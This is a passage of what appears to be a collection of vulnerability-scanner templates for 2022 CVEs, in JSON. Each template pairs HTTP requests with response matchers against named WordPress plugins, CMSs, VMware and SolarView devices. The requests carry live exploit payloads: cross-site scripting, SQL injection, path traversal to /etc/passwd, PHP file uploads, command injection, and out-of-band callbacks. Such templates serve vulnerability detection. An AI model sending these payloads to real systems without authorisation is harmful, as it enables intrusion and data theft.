/wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication 